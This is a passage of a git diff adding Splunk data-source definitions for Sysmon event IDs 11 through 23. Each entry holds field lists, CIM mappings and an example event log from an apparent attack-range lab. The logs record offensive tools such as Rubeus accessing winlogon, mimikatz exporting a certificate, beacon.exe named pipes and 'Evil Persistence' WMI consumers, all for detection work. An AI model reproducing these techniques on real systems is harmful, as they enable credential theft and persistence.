+  UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='UtcTime'>2022-02-01
+  21:01:44.670</Data><Data Name='SourceProcessGUID'>{3BF36828-9F6D-61F9-390A-02000000CF01}</Data><Data
+  Name='SourceProcessId'>1272</Data><Data Name='SourceThreadId'>956</Data><Data Name='SourceImage'>C:\Tools\Rubeus.exe</Data><Data
+  Name='TargetProcessGUID'>{3BF36828-4B37-61E8-0900-00000000CF01}</Data><Data Name='TargetProcessId'>572</Data><Data
+  Name='TargetImage'>C:\Windows\system32\winlogon.exe</Data><Data Name='GrantedAccess'>0x1f3fff</Data><Data
+  Name='CallTrace'>C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c01f5|UNKNOWN(00007FFD8E245F0C)</Data></EventData></Event>
diff --git a/data_sources/sysmon_eventid_11.yml b/data_sources/sysmon_eventid_11.yml
new file mode 100644
index 0000000000..bb79434a86
--- /dev/null
+++ b/data_sources/sysmon_eventid_11.yml
@@ -0,0 +1,102 @@
+name: Sysmon EventID 11
+id: f3db9179-f4f5-416d-bc03-39f4d4ff699e
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 11
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+  url: https://splunkbase.splunk.com/app/5709/
+  version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- CreationUtcTime
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- Guid
+- Image
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessGuid
+- ProcessID
+- ProcessId
+- RecordID
+- RecordNumber
+- RuleName
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- TargetFilename
+- Task
+- ThreadID
+- TimeCreated
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc_nt_host
+- event_id
+- eventtype
+- file_create_time
+- file_name
+- file_path
+- host
+- id
+- index
+- linecount
+- object_category
+- process_exec
+- process_guid
+- process_id
+- process_name
+- process_path
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- tag::object_category
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+field_mappings:
+- data_model: cim
+  data_set: Endpoint.Filesystem
+  mapping:
+    Computer: Filesystem.dest
+    ProcessGuid: Filesystem.process_guid
+    ProcessId: Filesystem.process_id
+    TargetFilename: Filesystem.file_path
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>11</EventID><Version>2</Version><Level>4</Level><Task>11</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated
+  SystemTime='2023-02-08T13:01:11.065939500Z'/><EventRecordID>7712490</EventRecordID><Correlation/><Execution
+  ProcessID='2940' ThreadID='3376'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-mhaag-attack-range-84.attackrange.local</Computer><Security
+  UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>Downloads</Data><Data
+  Name='UtcTime'>2023-02-08 13:01:11.053</Data><Data Name='ProcessGuid'>{0F9A6540-A70E-63E2-3091-00000000BD02}</Data><Data
+  Name='ProcessId'>9332</Data><Data Name='Image'>C:\Users\Administrator\Downloads\mimikatz_trunk\x64\mimikatz.exe</Data><Data
+  Name='TargetFilename'>C:\Users\Administrator\Downloads\mimikatz_trunk\x64\CURRENT_USER_My_4_atomic@art2.local.pfx</Data><Data
+  Name='CreationUtcTime'>2023-02-08 13:01:11.053</Data></EventData></Event>
diff --git a/data_sources/sysmon_eventid_12.yml b/data_sources/sysmon_eventid_12.yml
new file mode 100644
index 0000000000..87f7af49cd
--- /dev/null
+++ b/data_sources/sysmon_eventid_12.yml
@@ -0,0 +1,96 @@
+name: Sysmon EventID 12
+id: 3ef28798-8eaa-4fd2-b074-6f36d08a1b33
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 12
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+  url: https://splunkbase.splunk.com/app/5709/
+  version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- EventType
+- Guid
+- Image
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessGuid
+- ProcessID
+- ProcessId
+- RecordID
+- RecordNumber
+- RuleName
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- TargetObject
+- Task
+- ThreadID
+- TimeCreated
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- object_category
+- object_path
+- process_exec
+- process_guid
+- process_id
+- process_name
+- process_path
+- punct
+- registry_hive
+- registry_key_name
+- registry_path
+- severity_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- status
+- tag
+- tag::eventtype
+- tag::object_category
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>12</EventID><Version>2</Version><Level>4</Level><Task>12</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated
+  SystemTime='2021-07-12T08:10:32.607068200Z'/><EventRecordID>1055579</EventRecordID><Correlation/><Execution
+  ProcessID='1152' ThreadID='1212'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-890.attackrange.local</Computer><Security
+  UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='EventType'>DeleteKey</Data><Data
+  Name='UtcTime'>2021-07-12 08:10:32.592</Data><Data Name='ProcessGuid'>{466BC892-F8F2-60EB-107E-00000000CF01}</Data><Data
+  Name='ProcessId'>10188</Data><Data Name='Image'>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data><Data
+  Name='TargetObject'>HKU\S-1-5-21-2333072374-3391925831-3197092227-1112_Classes\exefile\shell\runas\command</Data></EventData></Event>
diff --git a/data_sources/sysmon_eventid_13.yml b/data_sources/sysmon_eventid_13.yml
new file mode 100644
index 0000000000..ae37b20a13
--- /dev/null
+++ b/data_sources/sysmon_eventid_13.yml
@@ -0,0 +1,113 @@
+name: Sysmon EventID 13
+id: 19cd00ee-f65f-48ca-bb08-64aac28638ce
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 13
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+  url: https://splunkbase.splunk.com/app/5709/
+  version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- Details
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- EventType
+- Guid
+- Image
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessGuid
+- ProcessID
+- ProcessId
+- RecordID
+- RecordNumber
+- RegistryValueData
+- RegistryValueType
+- RuleName
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- TargetObject
+- Task
+- ThreadID
+- TimeCreated
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- object_category
+- object_path
+- process_exec
+- process_guid
+- process_id
+- process_name
+- process_path
+- punct
+- registry_hive
+- registry_key_name
+- registry_path
+- registry_value_data
+- registry_value_name
+- registry_value_type
+- severity_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- status
+- tag
+- tag::eventtype
+- tag::object_category
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+field_mappings:
+- data_model: cim
+  data_set: Endpoint.Registry
+  mapping:
+    Computer: Registry.dest
+    ProcessGuid: Registry.process_guid
+    ProcessId: Registry.process_id
+    TargetObject: Registry.registry_path
+    Details: Registry.registry_value_data 
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>13</EventID><Version>2</Version><Level>4</Level><Task>13</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated
+  SystemTime='2021-07-12T08:11:04.548083500Z'/><EventRecordID>810987</EventRecordID><Correlation/><Execution
+  ProcessID='2012' ThreadID='2712'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-host-623.attackrange.local</Computer><Security
+  UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='EventType'>SetValue</Data><Data
+  Name='UtcTime'>2021-07-12 08:11:04.547</Data><Data Name='ProcessGuid'>{0C1E0330-048F-60E8-0B00-00000000D001}</Data><Data
+  Name='ProcessId'>628</Data><Data Name='Image'>C:\Windows\system32\lsass.exe</Data><Data
+  Name='TargetObject'>HKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHigh</Data><Data
+  Name='Details'>QWORD (0x01d776fd-0xd724b8c5)</Data></EventData></Event>
diff --git a/data_sources/sysmon_eventid_15.yml b/data_sources/sysmon_eventid_15.yml
new file mode 100644
index 0000000000..2a2740c8d3
--- /dev/null
+++ b/data_sources/sysmon_eventid_15.yml
@@ -0,0 +1,101 @@
+name: Sysmon EventID 15
+id: 95785e02-93b4-47e2-81f1-be326295348e
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 15
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+  url: https://splunkbase.splunk.com/app/5709/
+  version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- Contents
+- CreationUtcTime
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- Guid
+- Hash
+- IMPHASH
+- Image
+- Keywords
+- Level
+- MD5
+- Name
+- Opcode
+- ProcessGuid
+- ProcessID
+- ProcessId
+- RecordID
+- RecordNumber
+- RuleName
+- SHA256
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- TargetFilename
+- Task
+- ThreadID
+- TimeCreated
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc_nt_host
+- event_id
+- eventtype
+- file_create_time
+- file_hash
+- file_name
+- file_path
+- host
+- id
+- index
+- linecount
+- os
+- process_exec
+- process_guid
+- process_id
+- process_name
+- process_path
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>15</EventID><Version>2</Version><Level>4</Level><Task>15</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated
+  SystemTime='2021-04-28T20:11:34.709744300Z'/><EventRecordID>667860</EventRecordID><Correlation/><Execution
+  ProcessID='1952' ThreadID='2428'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>project-mumbai-host</Computer><Security
+  UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='UtcTime'>2021-04-28
+  20:11:34.709</Data><Data Name='ProcessGuid'>{ED2ECF8A-C154-6089-F967-00000000BB01}</Data><Data
+  Name='ProcessId'>7000</Data><Data Name='Image'>C:\Users\DefaultAccount\AppData\Roaming\Telegram
+  Desktop\Telegram.exe</Data><Data Name='TargetFilename'>C:\Users\DefaultAccount\Downloads\Telegram
+  Desktop\Good(NLA).txt:Zone.Identifier</Data><Data Name='CreationUtcTime'>2021-04-28
+  20:11:33.238</Data><Data Name='Hash'>MD5=C785C55D5FA3443A11B8417209C4B524,SHA256=D07777E0DC36EBECCE3FA9644F0F44DC4A0B7EDE0CBC1F5D33E8D6CB07AF5B5C,IMPHASH=00000000000000000000000000000000</Data><Data
+  Name='Contents'>[ZoneTransfer]  ZoneId=3  </Data></EventData></Event>
diff --git a/data_sources/sysmon_eventid_17.yml b/data_sources/sysmon_eventid_17.yml
new file mode 100644
index 0000000000..7157b87ee5
--- /dev/null
+++ b/data_sources/sysmon_eventid_17.yml
@@ -0,0 +1,91 @@
+name: Sysmon EventID 17
+id: 08924246-c8e8-4c95-a9fc-633c43cc82df
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 17
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+  url: https://splunkbase.splunk.com/app/5709/
+  version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- EventType
+- Guid
+- Image
+- Keywords
+- Level
+- Name
+- Opcode
+- PipeName
+- ProcessGuid
+- ProcessID
+- ProcessId
+- RecordID
+- RecordNumber
+- RuleName
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- TimeCreated
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- os
+- pipe_name
+- process_exec
+- process_guid
+- process_id
+- process_name
+- process_path
+- punct
+- severity_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>17</EventID><Version>1</Version><Level>4</Level><Task>17</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated
+  SystemTime='2021-04-19T21:00:18.288457000Z'/><EventRecordID>162168</EventRecordID><Correlation/><Execution
+  ProcessID='2816' ThreadID='2452'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-982.attackrange.local</Computer><Security
+  UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='EventType'>CreatePipe</Data><Data
+  Name='UtcTime'>2021-04-19 21:00:18.288</Data><Data Name='ProcessGuid'>{761B69BB-EF62-607D-B211-00000000BA01}</Data><Data
+  Name='ProcessId'>6960</Data><Data Name='PipeName'>\MSSE-1516-server</Data><Data
+  Name='Image'>C:\Users\Administrator\Desktop\beacon.exe</Data></EventData></Event>
diff --git a/data_sources/sysmon_eventid_18.yml b/data_sources/sysmon_eventid_18.yml
new file mode 100644
index 0000000000..411884fad5
--- /dev/null
+++ b/data_sources/sysmon_eventid_18.yml
@@ -0,0 +1,91 @@
+name: Sysmon EventID 18
+id: 37eb3554-214e-4e66-af10-c3ffc5b8ca82
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 18
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+  url: https://splunkbase.splunk.com/app/5709/
+  version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- EventType
+- Guid
+- Image
+- Keywords
+- Level
+- Name
+- Opcode
+- PipeName
+- ProcessGuid
+- ProcessID
+- ProcessId
+- RecordID
+- RecordNumber
+- RuleName
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- TimeCreated
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- os
+- pipe_name
+- process_exec
+- process_guid
+- process_id
+- process_name
+- process_path
+- punct
+- severity_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>18</EventID><Version>1</Version><Level>4</Level><Task>18</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated
+  SystemTime='2021-04-19T21:00:19.312721800Z'/><EventRecordID>162173</EventRecordID><Correlation/><Execution
+  ProcessID='2816' ThreadID='2452'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-982.attackrange.local</Computer><Security
+  UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='EventType'>ConnectPipe</Data><Data
+  Name='UtcTime'>2021-04-19 21:00:19.312</Data><Data Name='ProcessGuid'>{761B69BB-EF62-607D-B211-00000000BA01}</Data><Data
+  Name='ProcessId'>6960</Data><Data Name='PipeName'>\MSSE-1516-server</Data><Data
+  Name='Image'>C:\Users\Administrator\Desktop\beacon.exe</Data></EventData></Event>
diff --git a/data_sources/sysmon_eventid_20.yml b/data_sources/sysmon_eventid_20.yml
new file mode 100644
index 0000000000..f90ebcd91c
--- /dev/null
+++ b/data_sources/sysmon_eventid_20.yml
@@ -0,0 +1,94 @@
+name: Sysmon EventID 20
+id: aeee5374-3203-4286-b744-a8cc4ad1cd7e
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 20
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+  url: https://splunkbase.splunk.com/app/5709/
+  version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- Destination
+- DestinationNoQuotes
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- EventType
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- Operation
+- ProcessID
+- RecordID
+- RecordNumber
+- RuleName
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- TimeCreated
+- Type
+- User
+- UserID
+- UtcTime
+- Version
+- action
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- object
+- object_category
+- object_path
+- punct
+- severity_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_id
+- user_name
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>20</EventID><Version>3</Version><Level>4</Level><Task>20</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated
+  SystemTime='2020-12-08T13:54:48.517698800Z'/><EventRecordID>6249</EventRecordID><Correlation/><Execution
+  ProcessID='2504' ThreadID='3252'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-935.attackrange.local</Computer><Security
+  UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='EventType'>WmiConsumerEvent</Data><Data
+  Name='UtcTime'>2020-12-08 13:54:48.514</Data><Data Name='Operation'>Deleted</Data><Data
+  Name='User'>ATTACKRANGE\Administrator</Data><Data Name='Name'> "AtomicRedTeam-WMIPersistence-Example"</Data><Data
+  Name='Type'>Command Line</Data><Data Name='Destination'> "C:\\Windows\\System32\\notepad.exe"</Data></EventData></Event>
diff --git a/data_sources/sysmon_eventid_21.yml b/data_sources/sysmon_eventid_21.yml
new file mode 100644
index 0000000000..26a6f6af57
--- /dev/null
+++ b/data_sources/sysmon_eventid_21.yml
@@ -0,0 +1,96 @@
+name: Sysmon EventID 21
+id: 304384bc-715e-4958-988b-a8051a91349a
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 21
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+  url: https://splunkbase.splunk.com/app/5709/
+  version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- Consumer
+- ConsumerNoQuotes
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- EventType
+- Filter
+- FilterNoQuotes
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- Operation
+- ProcessID
+- RecordID
+- RecordNumber
+- RuleName
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- TimeCreated
+- User
+- UserID
+- UtcTime
+- Version
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- object
+- object_attrs
+- object_category
+- object_path
+- punct
+- result
+- severity_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_id
+- user_name
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>21</EventID><Version>3</Version><Level>4</Level><Task>21</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated
+  SystemTime='2021-06-16T21:46:50.225290200Z'/><EventRecordID>151644</EventRecordID><Correlation/><Execution
+  ProcessID='1972' ThreadID='3648'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-host-14.attackrange.local</Computer><Security
+  UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='EventType'>WmiBindingEvent</Data><Data
+  Name='UtcTime'>2021-06-16 21:46:50.222</Data><Data Name='Operation'>Modified</Data><Data
+  Name='User'>WIN-HOST-14\Administrator</Data><Data Name='Consumer'> "CommandLineEventConsumer.Name=\"Evil
+  Persistence\""</Data><Data Name='Filter'> "__EventFilter.Name=\"Evil Persistence\""</Data></EventData></Event>
diff --git a/data_sources/sysmon_eventid_22.yml b/data_sources/sysmon_eventid_22.yml
new file mode 100644
index 0000000000..0a321131f8
--- /dev/null
+++ b/data_sources/sysmon_eventid_22.yml
@@ -0,0 +1,89 @@
+name: Sysmon EventID 22
+id: 911538b2-eba7-4d3e-85e8-d82d380c37bf
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 22
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+  url: https://splunkbase.splunk.com/app/5709/
+  version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- Guid
+- Image
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessGuid
+- ProcessID
+- ProcessId
+- QueryName
+- QueryResults
+- QueryStatus
+- RecordID
+- RecordNumber
+- RuleName
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- TimeCreated
+- UserID
+- UtcTime
+- Version
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- process_exec
+- process_guid
+- process_name
+- punct
+- query
+- query_count
+- reply_code_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>22</EventID><Version>5</Version><Level>4</Level><Task>22</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated
+  SystemTime='2021-03-24T12:25:15.098978900Z'/><EventRecordID>113892</EventRecordID><Correlation/><Execution
+  ProcessID='2332' ThreadID='3400'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-299.attackrange.local</Computer><Security
+  UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='UtcTime'>2021-03-24
+  12:25:12.840</Data><Data Name='ProcessGuid'>{3CFDEE80-2F7D-605B-F50A-00000000AE01}</Data><Data
+  Name='ProcessId'>7172</Data><Data Name='QueryName'>50.220.65.3.spam.dnsbl.sorbs.net</Data><Data
+  Name='QueryStatus'>9003</Data><Data Name='QueryResults'>-</Data><Data Name='Image'>C:\Windows\System32\wermgr.exe</Data></EventData></Event>
diff --git a/data_sources/sysmon_eventid_23.yml b/data_sources/sysmon_eventid_23.yml
new file mode 100644
index 0000000000..9e45d94b4b
--- /dev/null
+++ b/data_sources/sysmon_eventid_23.yml
@@ -0,0 +1,103 @@
+name: Sysmon EventID 23
+id: 5ea2721d-f60c-4f48-a047-47d514e327c3
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 23
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+  url: https://splunkbase.splunk.com/app/5709/
+  version: 4.0.0
+fields:
+- _time
+- Archived
+- Channel
+- Computer
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- Guid
+- Hashes
+- IMPHASH
+- Image
+- IsExecutable
+- Keywords
+- Level
+- MD5
+- Name
+- Opcode
+- ProcessGuid
+- ProcessID
+- ProcessId
+- RecordID
+- RecordNumber
+- RuleName
+- SHA256
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- TargetFilename
+- Task
+- ThreadID
+- TimeCreated
+- User
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc_nt_host
+- event_id
+- eventtype
+- file_hash
+- file_modify_time
+- file_name
+- file_path
+- host
+- id
+- index
+- linecount
+- object_category
+- process_exec
+- process_guid
+- process_id
+- process_name
+- process_path
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- tag::object_category
+- timeendpos
+- timestartpos
+- user
+- user_id
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>23</EventID><Version>5</Version><Level>4</Level><Task>23</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated
+  SystemTime='2023-02-01T10:57:09.815326000Z'/><EventRecordID>281771</EventRecordID><Correlation/><Execution
+  ProcessID='2612' ThreadID='2304'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-ctus-attack-range-865.attackrange.local</Computer><Security
+  UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='UtcTime'>2023-02-01
